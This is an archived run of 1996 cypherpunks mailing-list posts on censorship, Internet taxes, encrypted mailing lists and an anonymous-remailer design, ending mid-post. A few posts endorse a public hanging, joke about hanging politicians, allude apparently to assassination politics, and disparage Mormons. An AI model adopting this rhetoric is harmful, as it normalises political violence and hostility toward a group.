Subject: Internet 'terrorism' newsclips [CYPHER, but news] Message-ID: [article in Parade] Love that in-depth technical reporting. >And from another piece of hard-hitting quote-the-official-source journalism >in PARADE, "A New Worry: Terrorism in Cyberspace" [snip] > > >>There were more than 250,000 attacks on Department of Defense computers >last >>year, and 65% were successful. Little is known about who launched them, >why, or >>what they found. In a recent test, Defense Department "red teams" admit to >>intentionally hacking into 18,200 systems, with only 5% of the attacks >>detected; only 27% of those attacks were reported. > >Wonder if the timing of these stories has anything to do with the end of >term legislative push on wiretapping. They're recycling an old USA Today piece. Turns out that figure was extrapolated by an internal investigation team trying to break into unclassified/non-secure systems. They just took the success rate for thier attacks and multiplied it by an arbitrary number to come up with an "annual" rate, according to the USA Today article. From tcmay at got.net Mon Sep 30 16:55:02 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 1 Oct 1996 07:55:02 +0800 Subject: Katz on cypherpunks, in HotWired's Media Rant In-Reply-To: Message-ID: At 9:06 AM -0700 9/30/96, Declan McCullagh wrote: >[Background: the cypherpunk/pw:cypherpunk account used for HotWired's >Threads discussion section has been used for anonymous flaming and >attacks. --Declan] > > Linkname: The Netizen - Media Rant - Jon Katz > URL: http://www.netizen.com/netizen/96/40/katz0a.html Katz has no understanding of the difference between someone (or some bunch) who use a name-password combination called "cypherpunks" with the discussions on the _list_ called cypherpunks. His comment, "Cypherpunks don't want real confrontations or discussions, or they would reveal their identities and make it possible to respond, as most flamers do. They are among media's rarest and at the same time most easily recognized subspecies: nihilists." shows the same level of sophistication as someone accusing Bill Clinton of misdeeds because "whitehouse.gov" is used as a name/password for some forum. Someone this naive (or this disingenous, if he knows better) has no business writing for anything about the Net. Once again, "Wired" and "HotWired" disgrace themselves. --Tim May >HotWired >The Netizen >30 Sep 96 > >[...] > > In addition, the digital culture has long been demonized by the > outside world and is inherently defensive and edgy. > > Cypherpunks give us fascinating insights into this subject, since > their equivalent exists in no other medium, and they epitomize the > often mindless verbal violence that characterizes some parts of the > Net. Their original purpose - techno-anarchy and advocating unfettered > access to information - conflict head-on with the Web's mainstreaming > and the arrival of the newly wired middle class. > > Cypherpunks don't want real confrontations or discussions, or they > would reveal their identities and make it possible to respond, as most > flamers do. They are among media's rarest and at the same time most > easily recognized subspecies: nihilists. > > Anonymous communication makes verbal violence easy. Since most flamers > don't know their targets and won't ever meet them, it's easy enough to > attack individuals and question personal motives, with none of the > social consequences of face-to-face verbal assaults. > > And Net communication also offers no filter: because it's > instantaneous, people often don't take the time to cool off, reflect, > or take another look at the messages they mail and post. > > When tempers flare here, it doesn't even take the time of a phone call > to pop off. So, hostile messages are often impulsive and frequently > regretted, apologized for, or taken back and clarified. > > Since the Net makes communication so easy, it makes corrections, > criticism, and discussion inevitable. Nobody who writes or posts on > the Web should expect anything less than sustained and continuous > challenge and critique, something that is rarely permitted in > mainstream journalism. Web writers and posters have to see these as > integral to their work - not simply attacks - and as healthy antidotes > to conventional media arrogance and elitism. > > Accompanying the hundreds and hundreds of personally assaultive > messages I've gotten - as opposed to the thousands of simply critical > ones - there is a strange and recurring phenomenon: If you respond > quickly and respectfully, the overwhelming majority of hostile > emailers either apologize, change their tone, or write back in a more > reflective, serious, or friendly way. Most of these posters are > stunned that anyone read their mail in the first place, or, even more > amazingly, responded to it. > >[...] We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Mon Sep 30 16:56:41 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 1 Oct 1996 07:56:41 +0800 Subject: the theory of split currency In-Reply-To: <199609301523.LAA15152@jekyll.piermont.com> Message-ID: "Perry E. Metzger" writes: > > > Is there a name for a dual or split currency, in which > > there is one currency for domestic use and another, different > > appearing, currency for foreign usage? > > I don't know of such a name, however... > > > Does anyone know of any country which has had such a > > split currency? > > ...this has been a common situation, in fact. South Africa, China, the > Soviet Union, and other unpleasant places have repeatedly done > this. Its usually a remarkably stupid idea. > > Perry Several Western European countries had such split currencies after WW II. Belgium's two francs have almost been phased out. Spain is the only major country with two currencies (ESP and ESB). They actually fetch slightly different interest rates. Chile introduced 'unidad de fomento' a while back, and many other minor players do something similar. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From travis at evtech.com Mon Sep 30 16:57:25 1996 From: travis at evtech.com (Travis Hassloch x231) Date: Tue, 1 Oct 1996 07:57:25 +0800 Subject: The Nature of the Cypherpunks List In-Reply-To: <199609241913.PAA19989@jekyll.piermont.com> Message-ID: <199609302011.PAA15378@tahiti.evtech.com> In message <199609241913.PAA19989 at jekyll.piermont.com> you write: > Timothy C. May writes: > > While some folks would rather we talked only about "crypto," just how many > > times can basic questions about Diffie-Hellman, or RSA, or elliptic curves > > be discussed? > > Sure, there is a limit to what can be said about cryptography and the > direct politics of cryptography. *THAT IS THE POINT*. That is why I'm > starting a new list -- so that I can abandon this waste heap to those > that like frolicking in the mire. here here. 400 messages in less than a week, with no digest, no moderated equivalent and no explanation for the "-ratings" list? who has time for that? i'm interested in crypto but i have a hard time believing any serious researcher could sift through all the messages and still have time left to eat & breathe, much less code! goodbye (again!) cypherpunks list! i had hoped things had changed in the last 2+ years but i guess not. as far as i'm concerned if it generates > 10 emails a day i'd have to justify reading it to my employers, or cut back on my coding at home, neither of which is likely to happen :) i am interested in any alternatives, cypherpunks readers... other mailing lists that are serious about crypto, security, etc. wasn't there talk at one time of a list for coders? can anyone remind me of what happened to it or where it exists now? From snow at smoke.suba.com Mon Sep 30 17:00:30 1996 From: snow at smoke.suba.com (snow) Date: Tue, 1 Oct 1996 08:00:30 +0800 Subject: [AP] Afghanistan In-Reply-To: Message-ID: <199609301804.NAA00350@smoke.suba.com> > > Afghanis publicly hanged their former president, Najibullah [no last name]. > Other countries should follow their example. One of my other .sigs: Think Globally. Act Locally. Support your Local Politician. With a rope. 4 lines, it isn't the law, it is simple fire prevention. Pain is a feature, not a bug. petro at suba.com petro at encodex.com petro at netsight.net petro at smoke.suba.com Petro, Christopher C. petro at suba.com snow at smoke.suba.com From deviant at pooh-corner.com Mon Sep 30 17:00:44 1996 From: deviant at pooh-corner.com (The Deviant) Date: Tue, 1 Oct 1996 08:00:44 +0800 Subject: the key of DES In-Reply-To: <199609301017.UAA04791@ssrnet.snu.ac.kr> Message-ID: On Mon, 30 Sep 1996, Kim Yoonjeong wrote: > Hello, all ! > With given a unknown DES system with 64 bits plaintext p, ciphertext c, > can there be MORE THAN ONE keys ? No. > If so, How is the probability (big or small)? > > Sincerely, > - Yoonejong > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > Yoonjeong Kim Email: yjkim at ssrnet.snu.ac.kr > Department of Computer Engineering Phone: +82-2-875-7726 (office) > Seoul National University +82-2-872-9801 (home) > Seoul 151-742 Korea Fax: +82-2-875-7726 > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > > --Deviant "If you eliminate the impossible, whatever remains, however improbable, must be true." -- Spock From snow at smoke.suba.com Mon Sep 30 17:01:52 1996 From: snow at smoke.suba.com (snow) Date: Tue, 1 Oct 1996 08:01:52 +0800 Subject: Public Schools In-Reply-To: Message-ID: <199609301822.NAA00388@smoke.suba.com> > On Sat, 28 Sep 1996, Adamsc wrote: > able to learn from their experiences, and will probably find working for > them less frustrating than working for a "Dilbert Zone" manager. Sooner > or later, though, you will encounter Dilbert's boss in the workplace, and > not everyone can leave to become a famous cartoonist. You may need to Well, there is always AP. > become (eeek!) a technical manager. You won't fare well if you've > completely neglected those non-technical skills. You'll be forced to > communicate with mundanes ... > Work to succeed in that creative writing course. Someday you will have a > Great Idea, and no matter how well you know you can implement the Great > Idea, you will need to convince others to believe, too. You will need > funding, or staffing, or equipment, and you will need to make others > understand the Great Idea, even if they do not have the technical > background to do so. You will be a sad and frustrated individual if you > cannot convince them. You get hold of a technical writer, explain it to them (they are use to translating geek to mundane). > Pack in all the math and comp sci you can, but take a real English course > or two, and not "pocket protector comp. 101", either. Dabble in eastern > philosophy, art history, or whatever catches your fancy, and see a bit of > the world outside the computer lab. Your technical skills will take you > much farther if you can understand their impact on the world. Good luck. While this is all true, most of it could be aquired in a competent High School. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:02:25 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 08:02:25 +0800 Subject: Encrypted lists and ease of use Message-ID: <01IA3FDVFUWO8Y57AQ@mbcl.rutgers.edu> Where was the information on PGPdomo? That would seem appropriate for the input end, at least. -Allen From: IN%"scs at lokkur.dexter.mi.us" 26-SEP-1996 17:26:10.69 Subj: Encrypted lists and ease of use I'm considering sending someone off to work on a project, but wanted to sanity-check the idea and see if someone already has something similar. Recently I've been involved in a number of small (30 people or less) mailing lists which occasionally use PGP for encrypted mail. The hassle comes when one is encrypting a message to the list. With people coming and going, remembering who is on what list is impossible. We're always having to go back and re-send to someone who was left off of the encryption list. What I propose to do is have a second list, list-encrypted at host, for every list at host. Any mail sent to the list simply goes out in plaintext. List-encrypted is encrypted for everyone on list, then sent to the list with appropriate additional headers. To secure the mail as it travels from the sender to list-encrypted, we want to establish a public key for list-encrypted. All mail to the list *must* travel with the public key or be rejected. When mail arrives at list-encrypted, a deamon will process it. The daemon knows the secret key for -encrypted, and has a list of who is on what list. The daemon strips the -encrypted address, encrypts the message for all on the list. If there are other people on the To: or Cc: fields, the deamon will encrypt for them as well. If any of this fails, the message is sent to as many as possible and notification failure goes back to the original sender indicating who the failures were. The daemon then forwards it to the list real list. It preserves the From: field, but changs `To: list-encrypted' into simply `To: list.' Comments? Generally useful? Beta volunteers? :-) -- "Yea, the heavens shall open and the NP-complete solution given forth. ATT executives shall give birth to two-headed operating systems, and copyrights shall be expunged. The voice of the GNU shall be heard, but the faithless will be without transceivers." -- me From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:05:04 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 08:05:04 +0800 Subject: More proposals for European censorship Message-ID: <01IA3E9U6S948Y57AQ@mbcl.rutgers.edu> From: IN%"trei at process.com" 24-SEP-1996 07:54:10.53 >Or are you suggesting that this particular gang of sub-humans was >exposed at this time in an attempt to influence policy, implying that >the Belgian LEAs knew about, but did not stop the ring until they >needed a publicity coup? How about "The LEAs put more effort into solving cases which can get a political benefit than ones that don't"? Given limited police resources (fortunately), they've got to prioritize somehow... and given politically-appointed higher-ups, some form of concentration on helpful-publicity cases is inevitable. -Allen From Ryan.Russell at sybase.com Mon Sep 30 17:10:30 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Tue, 1 Oct 1996 08:10:30 +0800 Subject: Utah as a Religious Police State Message-ID: <9609301838.AA26264@notesgw2.sybase.com> A couple of people have pointed out what he was talking about, one of which is below. I haven't been able to find an article on the web that does more than reference the event. I'll try to hunt up one of the books. If anyone cares, I'll post what I find later. Ryan ---------- Previous Message ---------- To: cypherpunks cc: From: mirele @ xmission.com ("Deana Holmes") @ smtp Date: 09/30/96 06:53:41 AM Subject: Re: Utah as a Religious Police State On 29 Sep 96 at 17:36, Ryan Russell/SYBASE wrote: > Hmm...never heard that one before. Care to produce > a reference? > > (Or am I supposed to be ignoring this guy when he > makes ridiculous claims?) > > Ryan I suspect that Dmitri is referring to the Mountain Meadows Massacre. It's not a pretty story and is one of the low points of Mormon history. The late historian Juanita Brooks wrote about the masscre, and about the leader, John D. Lee, in a couple of books. > ---------- Previous Message ---------- > To: cypherpunks > cc: > From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp > Date: 09/29/96 05:54:09 PM > Subject: Re: Utah as a Religious Police State > > Ryan Russell/SYBASE writes: > > I guess that depends on your definition of liberty. The Mormons > > originally moved there to have a place to practice their religion, > > and have freedom from persecution. I suppose one could extend that > > to wanting a place to have the freedom to have a set of rules consistant > > with their beliefs. Should that include freedom from interferance from > > folks such as yourself who want to change their rules, even though > > you're not presently effected? > > It's worth noting that one of Utah mormons favorite pastimes was to ambush > the settlers heading for California, kill them all, and take their property. > However the mormons were dealt with much less severely than the local Indians > who tried the same tricks. Pity. ===end vulis rant=== Deana Deana M. Holmes April 1996 poster child for clueless $cientology litigiousness alt.religion.scientology archivist since 2/95 mirele at xmission.com From rjasonc at pobox.com Mon Sep 30 17:14:27 1996 From: rjasonc at pobox.com (rjasonc) Date: Tue, 1 Oct 1996 08:14:27 +0800 Subject: Minor wording error in Snake Oil FAQ Message-ID: >Date: Mon, 30 Sep 96 11:05 EST >From: "Robert S. Powers" <@mcimail.com> >To: rjasonc >Subject: Wording error in your email > >Minor wording error. Your paragraph: > > random session This is a temporary key that is generated specifically for > key one message. Typically, in public key cryptosystems, the > message to be sent is encrypted with a symmetric key that > was specifically generated for that message. The encrypted > version of that message, as well as the associated session Wording error here > < > key can then be encrypted with the recipient's public key. > When the recipient decrypts the message, then, the system > will actually decrypt the message it gets (which is the > ciphertext message and the symmetric key to decrypt it), > and then use the symmetric key to decrypt the ciphertext. > The result is the plaintext message. This is often done > because of the tremendous difference in the speed of > symmetric vs. asymmetric ciphers. > > >...says that BOTH the message and the secret key are encrypted >using the public key system. I'm sure it's just a wording error; >but clearly the public key system is NOT generally used to encrypt >the full message. That would take too long, as you point out; >and that's why the secret key is used at all! > >bp From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:22:56 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 08:22:56 +0800 Subject: Lucent & Internet Phone Message-ID: <01IA3GPHPQ9O8Y57AQ@mbcl.rutgers.edu> > _________________________________________________________________ > PC Travel > _________________________________________________________________ > LUCENT VOWS TO MAKE INTERNET PHONES EASY TO USE > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > NEW YORK (Sep 17, 1996 7:53 p.m. EDT) - Lucent Technologies Inc., > vowing to make voice and video communication over the Internet as > easy-to-use and accessible as the telephone, unveiled Tuesday a new > business venture and several products designed to bring Internet > communication into the mainstream. [...] > The venture is charged with commercializing several ground-breaking > Internet software commpression technologies developed at Lucent's Bell > Laboratories research unit. Such technology shrinks the capacity > required to transmit information over communications networks. > Internet-based communications typically requires access to a personal > computer, but Lucent envisions using the telephone or other consumer > electronics device for the same purpose. > Murray Hill, N.J.-based Lucent said its new Elemedia Internet business > is now offering software that allows callers to hold > "telephone-quality" conversations over the Internet. Has anyone taken a look at this software with a view to an encryption patch? > Lucent said its strategy was to capitalize on software component > technology developed by Bell Labs by licensing it to other Internet > phone makers and established telephone carriers for use in their own > products. Lucent does not intend to sell its products directly to the > public. As I recall, Jeff Weinstein mentioned that he was looking into encryption for the Netscape Internet Phone. I would be curious if Netscape is considering integrating the Lucent software. > It said its products would be compatible with all major computer > operating systems and Internet browsers software. [...] > Lucent will introduce a means for callers using standard telephones to > place calls via the Internet to callers at conventional phones or to > newer PC-based phones. > "We believe voice communications between Internet PCs is much more > valuable if those voice conversations can happen with people who have > telephones," Pavarini said. > Lucent officials said these new business-oriented products will become > commercially available beginning in the first quarter of 1997 in the > United States and be rolled out to selected overseas markets through > the second quarter of 1997. [...] > Copyright © 1996 Nando.net From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:30:23 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 08:30:23 +0800 Subject: Malaysia ranting about the Internet Message-ID: <01IA3HHL8XEO8Y57AQ@mbcl.rutgers.edu> Rack up another country likely to start censoring the Net (or trying to, at least). What degree of Internet connectivity does Malaysia have, anyway? > _________________________________________________________________ > Centura > _________________________________________________________________ > MALAYSIA SAYS WEST SPREADING SMUT AND VIOLENCE > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > UNITED NATIONS (Sep 28, 1996 02:12 a.m. EDT) - Malaysia's prime > minister accused the West Friday of spreading smut and violence, > particularly on the Internet. And what, pray tell, is wrong with this? > In his speech to the U.N. General Assembly, Mahathir bin Mohamad said > that although the information age facilitated worldwide knowledge, it > also demeaned moral values. > "Smut and violence gratuitously distributed by criminals in the North > is no less polluting than carbon dioxide emissions nor less dangerous > than drug trafficking." All three of them things that probably shouldn't be limited, noticeably, and things that are classically used to discourage human freedom & progress. > In a reference to the United States he said if one great power could > apply its laws to citizens of another country for drug trafficking > "why cannot countries with different moral codes extradite the > traffickers of pornography for legal action?" > "Before the whole world sinks deeper into moral decay, the > international community should act. Abuse of the ubiquitous Internet > system must be stopped," he said. > Politically, he said the monopoly of the West's electronic media > should be broken on so-called world news networks. > "Not only are distorted pictures of our countries being broadcast but > our own capacity to understand what is happening is being undermined," > he said. Translation: people are finding out true information that local governments don't like - such as what goes wrong. > "In the past, Western missionaries spread the gospel. Today the media > has taken over and all our cherished values and diverse cultures are > being destroyed," he said. Translation: our culture that promotes censorship and other civil liberties violations is being destroyed. [...] > The prime minister also lashed out at U.N. forums where nations > lamented poverty, debt, human rights abuse, conflicts and war without > doing much about them. > "It is boring almost. And yet nothing much has been done which could > bring about amelioration of this sad state of affairs," he said. Translation: Give us money. > Copyright © 1996 Nando.net From mech at eff.org Mon Sep 30 17:32:34 1996 From: mech at eff.org (Stanton McCandlish) Date: Tue, 1 Oct 1996 08:32:34 +0800 Subject: Another briefing in Atlanta on the NRC crypto report,... (fwd) Message-ID: <199609302131.OAA02867@eff.org> CRYPTO typed: >From crypto at nas.edu Mon Sep 30 07:32:49 1996 Date: Mon, 30 Sep 96 10:26:00 EST From: "CRYPTO" Encoding: 27 Text Message-Id: <9608308441.AA844104704 at nas.edu> To: crypto at nas.edu Subject: Another briefing in Atlanta on the NRC crypto report,... Subject: Another briefing in Atlanta on the NRC crypto report, October 21, 1996 Cryptography's Role in Securing the Information Society A Public Briefing in Atlanta, Georgia Monday, October 21, 1996, 1:30-3:30 pm There will be a public briefing in Atlanta, Georgia by the National Research Council on this report. The briefing will be held at the Manufacturing Research Center on the campus of the Georgia Institute of Technology on Monday October 21, from 1:30 to 3:30. Dr. Herbert Lin, director of the NRC study will conduct the briefing. Questions from the audience will be entertained. For further information, please contact Dr. Myron L. Cramer (404) 894-7292, at the Georgia Tech Research Institute. The event is open to the press and the public. Directions: From I-75/85 exit on Tenth Street and head West. Turn left on Hemphill Street and follow it to where it ends on Ferst Street. The Manufacturing Research Center is the modern building in front of you. Parking is limited; use public transportation or allow yourself extra time. If you have suggestions about other places that the committee should offer a public briefing, please send e-mail to crypto at nas.edu. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Program Director From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:39:13 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 08:39:13 +0800 Subject: Inflation-index bonds and private e-currency Message-ID: <01IA3GAFNCWK8Y57AQ@mbcl.rutgers.edu> One of the attractions of privately-produced currencies is as a hedge against inflation; this development may be a competitor to this idea. On the other hand, this setup does have an unavailability in _time_ of the money (more so than other, equal-security bonds of the same duration), which may offset its greater spendability. -Allen > BARRON'S Online - Market Surveillance for the Financial Elite > _________________________________________________________________ > Barron's > _________________________________________________________________ > CLINTON UNVEILING NEW GOVERNMENT BOND WITH INFLATION PROTECTION > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 The Associated Press > WASHINGTON (Sep 25, 1996 11:12 a.m. EDT) -- President Clinton, in his > latest election-year appeal to the middle class, is unveiling details > of a new type of government bond that will offer investors protection > against inflation. [...] > As the program was explained, the securities will protect the > principal against inflation, as measured by the consumer price index. > As an example, the official said, if inflation increases 3 percent in > a given year, a $1,000 bond would be adjusted upward to $1,030 at the > end of that year. > By offering this protection, interest rates on the bonds will be lower > than on regular 10-year notes that do not provide inflation > protection. [...] > The notion of tying government securities to inflation has not been > tried in the United States, but other countries have been offering > such investments for some time. > Such bonds have been available in Britain since 1981 and are also > offered in Canada, New Zealand, Australia, Israel and Sweden. > Copyright © 1996 Nando.net From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:39:38 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 08:39:38 +0800 Subject: [NEWS] More internet-tax proposals Message-ID: <01IA3GIEKEYW8Y57AQ@mbcl.rutgers.edu> > _________________________________________________________________ > Centura > _________________________________________________________________ > INTERNET BEWARE: GOVERNMENTS ARE SMELLING A RICH NEW SOURCE OF TAXES > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 The Boston Globe > (Sep 25, 1996 8:06 p.m. EDT) If taxes are the price we pay for > civilization, the Internet is about to become a lot more civilized. > State and local governments are coming to see on-line computer > networks as a rich, new revenue source, and they want to cash in. > An official of the Massachusetts Department of Revenue said this month > on-line service providers that do business in the state should be > paying a 5 percent sales tax. Those who haven't been paying could face > audits, penalties and demands for back taxes. > The state of Tennessee has demanded on-line services doing business > there turn over their tax records and a count of how many customers > they have in the state. Cities in Texas and Colorado are considering > special on-line taxes. And a recent effort to slap a 6 percent tax on > Internet users in Tacoma, Wash., aroused so much public outrage that > city officials were forced to back off. > Many Internet experts agree that Internet taxes are inevitable. After > all, connecting computers to the Internet is now a $2 billion > business, and people use these networks to buy and sell millions of > dollars in goods and services. [...] > But some also fear the chaos that could result as 50 state governments > and thousands of cities and counties each make their own rules about > taxing computer networks and the transactions that occur on them. > The issue may be given new prominence, thanks to a surprising decision > by a major Internet service provider. In late August, Netcom On-Line > Communication Services Inc. began notifying its Massachusetts > customers the company would start adding the state's 5 percent sales > tax to its bills. Netcom typically charges $19.95 a month for a > personal Internet account, so the tax would amount to $1. Similar > notices were sent to Netcom customers in several other states, > including Illinois and Pennsylvania. > Did the taxing authorities in these states demand their money? Guess > again. Netcom has decided to begin paying the taxes voluntarily. > Thomas Weatherford, Netcom's chief financial officer, said its > accounting firm, Ernst & Young, warned them early this year that > Netcom might be liable for the taxes. [...] > So Netcom contacted state tax officials for clarification. Netcom's > 500,000 customers are scattered throughout the United States, but the > company is focusing on tax laws in Massachusetts and 14 other states > where most of its customers dwell. Weatherford said he still had > received no official word from Massachusetts, but Netcom attorneys had > concluded the company is subject to the state's telecommunication > sales tax. To play it safe, it will begin collecting the tax this > month. Remind me not to sign up with Netcom. > It's probably a smart move. At the Massachusetts Department of > Revenue, acting general counsel William Hazel told the Globe that > Netcom and every other on-line service provider should be paying the > sales tax. > "To the extent that folks are being charged for the ability to > telecommunicate through the Internet... that's taxable," he said. > This situation could change. The state has set up a legislative > commission to review its telecommunications tax policy, with a final > report due next year. But for now, Hazel said, Massachusetts wants its > money, including back taxes from up to seven years ago. Hazel said > some Internet access providers are paying the tax already. > But plenty of others are not. For example, Kristopher Hill, president > of NetWorx Internet Services Inc. in Newburyport, said he believed his > firm didn't have to pay sales tax in any of the dozen states in which > it operates. He wasn't thrilled to hear that he may be wrong. "If we > have to start dealing with Chicago tax law, that'll be a major pain in > my butt," he said. Chicago imposes a tax on telecommunications > services over and above the Illinois state tax. > Hill is even more annoyed by the prospect of being ordered to pay > years of back sales taxes in Massachusetts. He said state officials > never told Internet service providers they were liable for the money, > and to try to collect it now would be unfair. "We would sooner leave > the commonwealth than be subjected to seemingly arbitrary and > ill-defined taxes," Hill said. [...] > Netcom's Weatherford opposes taxes on Internet services but says if > his company pays voluntarily, tax officials should demand payment from > Netcom's competitors. That could mean trouble for America's 3,700 > Internet service providers, many of which are shoestring operations > that will have to set up tax collection procedures. Translation: Netcom is attempting to use regulations to shut down its competitors. > The fuss over Internet service taxes is just the beginning. Another > sticky controversy awaits: How do you tax sales of goods and services > over the Internet? [...] > And then there's the question of which government is entitled to > collect the tax. Say you log on to Ohio-based CompuServe, where you > buy a fruit basket from a firm in California and have it sent to your > mother in Chicago. Which state gets to collect tax on the transaction? > The experts say right now, the answer is unclear. If they think that's "unclear", wait until they start dealing with multinational transactions.... > But tax-hungry governments are hard at work trying to figure it all > out. According to KPMG Peat Marwick, sales of goods and services over > the Internet will reach $125 billion by the year 2000. One way or > another, governments intend to get their share. Note the typical biased phrasing. [...] > Copyright © 1996 Nando.net From snow at smoke.suba.com Mon Sep 30 17:49:49 1996 From: snow at smoke.suba.com (snow) Date: Tue, 1 Oct 1996 08:49:49 +0800 Subject: Making Remailers Widespread [REMAILERS] In-Reply-To: <199609290623.XAA25604@dfw-ix3.ix.netcom.com> Message-ID: <199609301757.MAA00328@smoke.suba.com> Mr. Stewart said: > I agree, it's a problem; the return address seems to reduce abuse. > But one-way remailers can be used to simulate many of the uses of two-way, > especially with message-pool return methods (e.g. alt.anonymous.messages.) > Doing two-way remailers well is hard - most of the methods around are ok > for passive attacks, but may not resist subpoenas, rubber-hose, or crackers. > It's especially hard if you want the remailer to be a no-brainer to install > and operate, rather than one that requires expert support. > Snow's one-shot reply block method is interesting, whether you do a public-key > or secret-key approach (if you do public key, you obviously use the public > half for the part that stays at the remailer.) It has the real advantage that > compromising the remailer doesn't give you the reply information for past or > current messages, so you can only compromise one message at a time, > which is a big win over the one-key-per-remailer reply blocks. > I think I like it. > On the other hand, there are a host of potential problems: > - Chaining is probably more difficult, at least return-chaining. Each reply refers to the remailer before it. The originating web site hands the originator a key and a pseudo-random ID. The originator can check check back on a regular basis to see if a reply came back in. That way there is no "final trail" and the reciepent can view the page thru something like www.anonymizer.com. > - Individual True Believer remailer operators would usually resist > cooperating with authorities to decrypt the reply block, but ad-hoc > remailer operators who are just running a remailer because they haven't > turned off the default feature that came with their Web Server > will probably reveal the key, especially for Politically Incorrect material > (definition depends on their individual politics, of course.) Set a time limit on replies (say 5 days) and after the 5 days, the reply is deleted by the server. That way the casual user would have to hack the code to _keep_ the addresses on hand, and the censors would have to get back thru the entire chain in 5 days, and they don't know the entire chain to begin with. If you can get the web server spread out internationally, that ain't gonna happen. > - A web form interface, filled out from a web anonymizer, doesn't > give you a useful return address, so spammers can still abuse it. If you inert the *this is an anonymous email* automaticaly, this won't matter as much. Commercial spammers will have to put a commercial access point (phone, fax, email address) in their message and people who are just harassing others will get deleted pretty quick. Spam itself will be cut back as you only allow number of addresses per message, and set it up so that you enter the addresses on a seperate page from the message. That way to hit 2 or 3 hundered email addresses you have to enter the message 100 times. Ok, so cut and paste 100 times, but if the spammer has a brain (I know, but there may be one or two) they are going get the spam out. How about this (It is a little complicated, so it may not work) Alice wants to send email to Bob, so she hit's sameers anonmymizer site to go to a random remailer web site. At this site she enters Bobs email address on one page, and on the next enters her message. This message could even be encrypted, assuming that Bob knows what to do with it. Hit send. The webremailer software hands Alice a temporary (10 day expire time) ID and key/passphrase. The webremailer selects the next mailer in the chain, encrypts the message, writes the public key and encrypted message to disk (with date stamp), and forwards the email (encrypted message + key) to the next remailer. The second (and each succeeding remailer in the chain) simply re-writes the headers and writes a keyid/previous-remailer pair file (with date stamp) to file. (maybe even keep a single database file with this info in it, a single file might not get written to disk as often (maybe) and with constant would be marginally harder to "recover" old addresses from than multiple hard files (or would it?) and then sends the mail on. If we can use the "puts" feature, we really don't need much in the way of headers right? Anyway the last remailer in the chain writes a simple web page with the keyid of the keypair, and simply sends the key and an address to the receipent so that 1) the final "message" is still not the email, only a notice that email is waiting, for instance http://www.encodex.com/anonmail/id0x4556/ The reciepient then goes to the site (or doesn't if they don't want email) they can use www.anonymizer.com if they wish, and they enter their key when prompted. The encrypted file is then decrypted and sent to them. At this point, the encryption is more to prevent the "prying eyes" than TLA level snooping, so it has to be good, but it doesn't have to be 2000 bit RSA type stuff. That can be done at the message level. Return messages would include the keyid of the sent message, and would retrace the same hops. At the original end, a simple web page is written and a "you have a reply to your anonymous message at http://www.encodex.com /anonmail/id0x99a4/ Holes? Petro, Christopher C. petro at suba.com snow at smoke.suba.com From declan at well.com Mon Sep 30 18:16:55 1996 From: declan at well.com (Declan McCullagh) Date: Tue, 1 Oct 1996 09:16:55 +0800 Subject: FRC's Cathy Cleaver bashes CDA ruling, online "anarchy" Message-ID: ---------- Forwarded message ---------- Date: Mon, 30 Sep 1996 07:49:55 -0700 (PDT) From: Declan McCullagh To: fight-censorship at vorlon.mit.edu Subject: FRC's Cathy Cleaver bashes CDA ruling, online "anarchy" This is a wonderful article by the Family Research Council's Cathy Cleaver. Her stategy: Rant about porn, rant about children. But ignore that the Internet is not radio or television so different standards should apply. And ignore that another three-judge panel in NYC came to similar conclusions as the Philly ones did. Obviously, the largely Bush- and Reagan-appointed Federal judiciary has been brainwashed by computer geeks. Or perhaps the judges, unlike Ms. Cleaver, actually logged on once or twice. -Declan ************ http://www.frc.org/townhall/FRC/perspective/pv96i3pn.html CYBERCHAOS: NOT FIRST AMENDMENT'S PROMISE by Cathleen A. Cleaver, Esq. The Department of Justice has announced that it will appeal to the Supreme Court the recent Philadelphia federal court's ruling against the Communications Decency Act. That appeal is the right thing to do, and here's why. Not long ago I debated Bob Guccioni, publisher of Penthouse, on the merits of restricting computer pornography and the Philadelphia ruling. Not surprisingly, he was elated by the three-judge panel's decision to strike the indecency provisions, the effect of which was to give a computer pornographer more "free speech" rights than any other speaker in any other forum. For the first time in the history of our country, a 